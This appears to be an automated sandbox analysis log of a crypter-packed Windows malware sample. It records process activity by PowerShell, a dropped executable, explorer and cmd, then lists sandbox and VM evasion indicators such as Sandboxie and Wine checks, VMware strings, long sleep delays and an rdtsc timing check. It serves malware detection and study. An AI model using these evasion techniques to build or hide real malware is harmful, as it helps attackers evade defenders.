            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 3292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: FqJXaFxwEj.exe PID: 5516, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe TID: 4584Thread sleep time: -38122s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192Thread sleep count: 9277 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe TID: 5560Thread sleep time: -38122s >= -30000s
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe TID: 2472Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD5BA5 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9438
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9277
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeAPI coverage: 1.2 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeThread delayed: delay time: 38122
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread delayed: delay time: 38122
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 0000000E.00000000.411916320.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
            Source: explorer.exe, 0000000E.00000000.454651139.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 0000000E.00000000.400286007.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
            Source: FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
